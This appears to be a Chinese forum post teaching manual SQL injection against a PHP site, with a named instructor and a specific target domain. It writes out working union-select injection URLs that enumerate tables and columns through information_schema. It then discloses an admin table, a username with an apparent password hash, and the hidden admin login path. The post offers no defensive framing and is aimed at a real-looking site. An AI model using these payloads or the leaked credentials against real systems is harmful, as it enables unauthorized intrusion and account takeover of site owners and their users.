教程名称:手工注入php
讲师:I.n.c゛啵、 QQ:380547774目标站:http://www.xabc.net/
我已经找到注入点http://www.xabc.net/xuexi.php?typeid=18
猜表名我们要用到table_name 和 information_schema.tables 了
我已经构造好了
http://www.xabc.net/xuexi.php?typeid=18 and 1=2 union select 1,2,table_name,4,5,6,7 from information_schema.tables
猜列名和表名差不多 用到column_name 和 information_schema.columns
http://www.xabc.net/xuexi.php?typeid=18 and 1=2 union select 1,2,column_name,4,5,6,7 from information_schema.columns
列名太多 我就不查了先前已经查出来了 yjc_admin
y_admin y_pass
abc_net a191e01243ce9c58f4ac3ebe8622505dxabc123
后台比较隐蔽我已经找到了
http://www.xabc.net/lvinghack/login.html
http://down.qiannao.com/space/file/qiannao/share/2011/2/1/-7b2c-516b-8bfe.rar/.page
页:
[1]